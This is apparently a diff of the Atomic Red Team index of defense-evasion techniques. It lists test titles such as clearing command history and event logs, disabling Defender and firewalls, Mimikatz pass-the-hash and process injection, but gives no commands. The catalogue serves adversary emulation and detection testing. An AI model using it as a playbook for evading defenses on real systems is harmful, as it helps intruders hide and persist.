- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -528,16 +486,15 @@
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
- [T1070.003 Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux]
- Atomic Test #2: Clear Bash history (echo) [linux, macos]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #5: Clear Bash history (truncate) [linux]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
- Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
- Atomic Test #9: Disable Bash History Logging with SSH -T [linux]
- Atomic Test #10: Prevent Powershell History Logging [windows]
- Atomic Test #11: Clear Powershell History by Deleting History File [windows]
- Atomic Test #9: Prevent Powershell History Logging [windows]
- Atomic Test #10: Clear Powershell History by Deleting History File [windows]
- [T1070.002 Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- Atomic Test #2: Overwrite Linux Mail Spool [linux]
@@ -545,17 +502,11 @@
- [T1070.001 Clear Windows Event Logs](../../T1070.001/T1070.001.md)
- Atomic Test #1: Clear Logs [windows]
- Atomic Test #2: Delete System Logs Using Clear-EventLog [windows]
- Atomic Test #3: Clear Event Logs via VBA [windows]
- [T1078.004 Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, windows, linux, macos]
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027.004 Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #1: Compile After Delivery using csc.exe [windows]
- Atomic Test #2: Dynamic C# Compile [windows]
- Atomic Test #3: C compile [linux, macos]
- Atomic Test #4: CC compile [linux, macos]
- Atomic Test #5: Go compile [linux, macos]
- [T1218.001 Compiled HTML File](../../T1218.001/T1218.001.md)
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
@@ -564,60 +515,35 @@
- Atomic Test #5: Invoke CHM Simulate Double click [windows]
- Atomic Test #6: Invoke CHM with Script Engine and Help Topic [windows]
- Atomic Test #7: Invoke CHM Shortcut Command with ITS and Help Topic [windows]
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.002 Control Panel](../../T1218.002/T1218.002.md)
- Atomic Test #1: Control Panel Items [windows]
- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
- Atomic Test #1: Access Token Manipulation [windows]
- T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
- Atomic Test #2: Certutil Rename and Decode [windows]
- Atomic Test #3: Base64 decoding with Python [linux, macos]
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
- Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
- Atomic Test #6: Hex decoding with shell utilities [linux, macos]
- T1610 Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1006 Direct Volume Access](../../T1006/T1006.md)
- Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
- [T1562.008 Disable Cloud Logs](../../T1562.008/T1562.008.md)
- Atomic Test #1: AWS CloudTrail Changes [iaas:aws]
- Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
- Atomic Test #3: Office 365 - Exchange Audit Log Disabled [office-365]
- T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.002 Disable Windows Event Logging](../../T1562.002/T1562.002.md)
- Atomic Test #1: Disable Windows IIS HTTP Logging [windows]
- Atomic Test #2: Kill Event Log Service Threads [windows]
- Atomic Test #3: Impair Windows Audit Log Policy [windows]
- Atomic Test #4: Clear Windows Audit Policy Config [windows]
- Atomic Test #5: Disable Event Logging with wevtutil [windows]
- Atomic Test #6: Makes Eventlog blind with Phant0m [windows]
- T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #1: Disable Microsoft Defender Firewall [windows]
- Atomic Test #2: Disable Microsoft Defender Firewall via Registry [windows]
- Atomic Test #1: Disable iptables firewall [linux]
- Atomic Test #2: Disable Microsoft Defender Firewall [windows]
- Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
- Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
- Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
- Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
- Atomic Test #7: Stop/Start UFW firewall [linux]
- Atomic Test #8: Stop/Start UFW firewall systemctl [linux]
- Atomic Test #9: Turn off UFW logging [linux]
- Atomic Test #10: Add and delete UFW firewall rules [linux]
- Atomic Test #11: Edit UFW firewall user.rules file [linux]
- Atomic Test #12: Edit UFW firewall ufw.conf file [linux]
- Atomic Test #13: Edit UFW firewall sysctl.conf file [linux]
- Atomic Test #14: Edit UFW firewall main configuration file [linux]
- Atomic Test #15: Tail the UFW firewall log file [linux]
- [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #1: Disable syslog [linux]
- Atomic Test #2: Disable Cb Response [linux]
@@ -643,32 +569,16 @@
- Atomic Test #22: Tamper with Windows Defender Evade Scanning -Folder [windows]
- Atomic Test #23: Tamper with Windows Defender Evade Scanning -Extension [windows]
- Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
- Atomic Test #25: office-365-Disable-AntiPhishRule [office-365]
- Atomic Test #26: Disable Windows Defender with DISM [windows]
- Atomic Test #27: Disable Defender with Defender Control [windows]
- Atomic Test #28: Disable Defender Using NirSoft AdvancedRun [windows]
- Atomic Test #29: Kill antimalware protected processes using Backstab [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
- T1036.007 Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.004 File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
@@ -680,12 +590,14 @@
- Atomic Test #8: Delete Filesystem - Linux [linux]
- Atomic Test #9: Delete Prefetch File [windows]
- Atomic Test #10: Delete TeamViewer Log Files [windows]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1553.001 Gatekeeper Bypass](../../T1553.001/T1553.001.md)
- Atomic Test #1: Gatekeeper Bypass [macos]
- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.003 HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
@@ -694,28 +606,18 @@
- Atomic Test #5: Hidden files [macos]
- Atomic Test #6: Hide a Directory [macos]
- Atomic Test #7: Show all hidden files [macos]
- Atomic Test #8: Hide Files Through Registry [windows]
- [T1564.002 Hidden Users](../../T1564.002/T1564.002.md)
- Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
- Atomic Test #2: Create Hidden User using IsHidden option [macos]
- [T1564.003 Hidden Window](../../T1564.003/T1564.003.md)
- Atomic Test #1: Hidden Window [windows]
- [T1564 Hide Artifacts](../../T1564/T1564.md)
- Atomic Test #1: Extract binary files via VBA [windows]
- Atomic Test #2: Create a Hidden User Called "$" [windows]
- Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.006 Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
- Atomic Test #2: Logging Configuration Changes on Linux Host [linux]
- Atomic Test #3: Disable Powershell ETW Provider - Windows [windows]
- Atomic Test #4: Disable .NET Event Tracing for Windows Via Registry (cmd) [windows]
- Atomic Test #5: Disable .NET Event Tracing for Windows Via Registry (powershell) [windows]
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- Atomic Test #2: Lgging Configuration Changes on Linux Host [linux]
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070 Indicator Removal on Host](../../T1070/T1070.md)
- Atomic Test #1: Indicator Removal using FSUtil [windows]
- [T1202 Indirect Command Execution](../../T1202/T1202.md)
@@ -727,8 +629,6 @@
- Atomic Test #2: Install root CA on Debian/Ubuntu [linux]
- Atomic Test #3: Install root CA on macOS [macos]
- Atomic Test #4: Install root CA on Windows [windows]
- Atomic Test #5: Install root CA on Windows with certutil [windows]
- Atomic Test #6: Add Root Certificate to CurrentUser Certificate Store [windows]
- [T1218.004 InstallUtil](../../T1218.004/T1218.004.md)
- Atomic Test #1: CheckIfInstallable method call [windows]
- Atomic Test #2: InstallHelper method call [windows]
@@ -738,8 +638,11 @@
- Atomic Test #6: InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant [windows]
- Atomic Test #7: InstallUtil HelpText method call [windows]
- Atomic Test #8: InstallUtil evasive invocation [windows]
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1149 LC_MAIN Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1149 LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.006 LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- [T1222.002 Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [macos, linux]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [macos, linux]
@@ -750,66 +653,23 @@
- Atomic Test #7: chown - Change file or folder mode ownership only [macos, linux]
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- T1218.014 MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1127.001 MSBuild](../../T1127.001/T1127.001.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
- Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
- Atomic Test #1: Mount ISO image [windows]
- Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
- Atomic Test #3: Remove the Zone.Identifier alternate data stream [windows]
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md)
- Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
- Atomic Test #2: Creating W32Time similar named service using sc [windows]
- [T1036 Masquerading](../../T1036/T1036.md)
- Atomic Test #1: System File Copied to Unusual Location [windows]
- Atomic Test #2: Malware Masquerading and Execution from Zip File [windows]
- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- Atomic Test #2: Masquerade as a built-in system executable [windows]
- T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1112 Modify Registry](../../T1112/T1112.md)
- Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
- Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
- Atomic Test #3: Modify registry to store logon credentials [windows]
- Atomic Test #4: Add domain to Trusted sites Zone [windows]
- Atomic Test #5: Javascript in registry [windows]
- Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
- Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
- Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
- Atomic Test #9: Disable Windows Registry Tool [windows]
- Atomic Test #10: Disable Windows CMD application [windows]
- Atomic Test #11: Disable Windows Task Manager application [windows]
- Atomic Test #12: Disable Windows Notification Center [windows]
- Atomic Test #13: Disable Windows Shutdown Button [windows]
- Atomic Test #14: Disable Windows LogOff Button [windows]
- Atomic Test #15: Disable Windows Change Password Feature [windows]
- Atomic Test #16: Disable Windows Lock Workstation Feature [windows]
- Atomic Test #17: Activate Windows NoDesktop Group Policy Feature [windows]
- Atomic Test #18: Activate Windows NoRun Group Policy Feature [windows]
- Atomic Test #19: Activate Windows NoFind Group Policy Feature [windows]
- Atomic Test #20: Activate Windows NoControlPanel Group Policy Feature [windows]
- Atomic Test #21: Activate Windows NoFileMenu Group Policy Feature [windows]
- Atomic Test #22: Activate Windows NoClose Group Policy Feature [windows]
- Atomic Test #23: Activate Windows NoSetTaskbar Group Policy Feature [windows]
- Atomic Test #24: Activate Windows NoTrayContextMenu Group Policy Feature [windows]
- Atomic Test #25: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows]
- Atomic Test #26: Hide Windows Clock Group Policy Feature [windows]
- Atomic Test #27: Windows HideSCAHealth Group Policy Feature [windows]
- Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows]
- Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
- Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
- Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
- Atomic Test #32: Windows Powershell Logging Disabled [windows]
- Atomic Test #33: Windows Add Registry Value to Load Service in Safe Mode without Network [windows]
- Atomic Test #34: Windows Add Registry Value to Load Service in Safe Mode with Network [windows]
- T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.005 Mshta](../../T1218.005/T1218.005.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
@@ -820,42 +680,24 @@
- Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows]
- Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows]
- Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
- Atomic Test #10: Mshta used to Execute PowerShell [windows]
- [T1218.007 Msiexec](../../T1218.007/T1218.007.md)
- Atomic Test #1: Msiexec.exe - Execute Local MSI file with embedded JScript [windows]
- Atomic Test #2: Msiexec.exe - Execute Local MSI file with embedded VBScript [windows]
- Atomic Test #3: Msiexec.exe - Execute Local MSI file with an embedded DLL [windows]
- Atomic Test #4: Msiexec.exe - Execute Local MSI file with an embedded EXE [windows]
- Atomic Test #5: WMI Win32_Product Class - Execute Local MSI file with embedded JScript [windows]
- Atomic Test #6: WMI Win32_Product Class - Execute Local MSI file with embedded VBScript [windows]
- Atomic Test #7: WMI Win32_Product Class - Execute Local MSI file with an embedded DLL [windows]
- Atomic Test #8: WMI Win32_Product Class - Execute Local MSI file with an embedded EXE [windows]
- Atomic Test #9: Msiexec.exe - Execute the DllRegisterServer function of a DLL [windows]
- Atomic Test #10: Msiexec.exe - Execute the DllUnregisterServer function of a DLL [windows]
- Atomic Test #11: Msiexec.exe - Execute Remote MSI file [windows]
- Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows]
- Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows]
- Atomic Test #3: Msiexec.exe - Execute Arbitrary DLL [windows]
- [T1564.004 NTFS File Attributes](../../T1564.004/T1564.004.md)
- Atomic Test #1: Alternate Data Streams (ADS) [windows]
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
- Atomic Test #3: Create ADS command prompt [windows]
- Atomic Test #4: Create ADS PowerShell [windows]
- T1599.001 Network Address Translation Traversal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1599 Network Boundary Bridging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.005 Network Share Connection Removal](../../T1070.005/T1070.005.md)
- Atomic Test #1: Add Network Share [windows]
- Atomic Test #2: Remove Network Share [windows]
- Atomic Test #3: Remove Network Share PowerShell [windows]
- Atomic Test #4: Disable Administrative Share Creation at Startup [windows]
- Atomic Test #5: Remove Administrative Shares [windows]
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- Atomic Test #2: Execute base64-encoded PowerShell [windows]
- Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
- Atomic Test #4: Execution from Compressed File [windows]
- Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows]
- Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows]
- Atomic Test #7: Obfuscated Command in PowerShell [windows]
- Atomic Test #8: Obfuscated Command Line using special Unicode characters [windows]
- [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
@@ -867,38 +709,28 @@
- [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1550.003 Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows]
- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- T1601.001 Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Shellcode execution via VBA [windows]
- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1216.001 PubPrn](../../T1216.001/T1216.001.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.009 Regsvcs/Regasm](../../T1218.009/T1218.009.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvcs Uninstall Method Call Test [windows]
@@ -907,7 +739,6 @@
- Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]
- Atomic Test #3: Regsvr32 local DLL execution [windows]
- Atomic Test #4: Regsvr32 Registering Non DLL [windows]
- Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows]
- [T1036.003 Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #1: Masquerading as Windows LSASS process [windows]
- Atomic Test #2: Masquerading as Linux crond process. [linux]
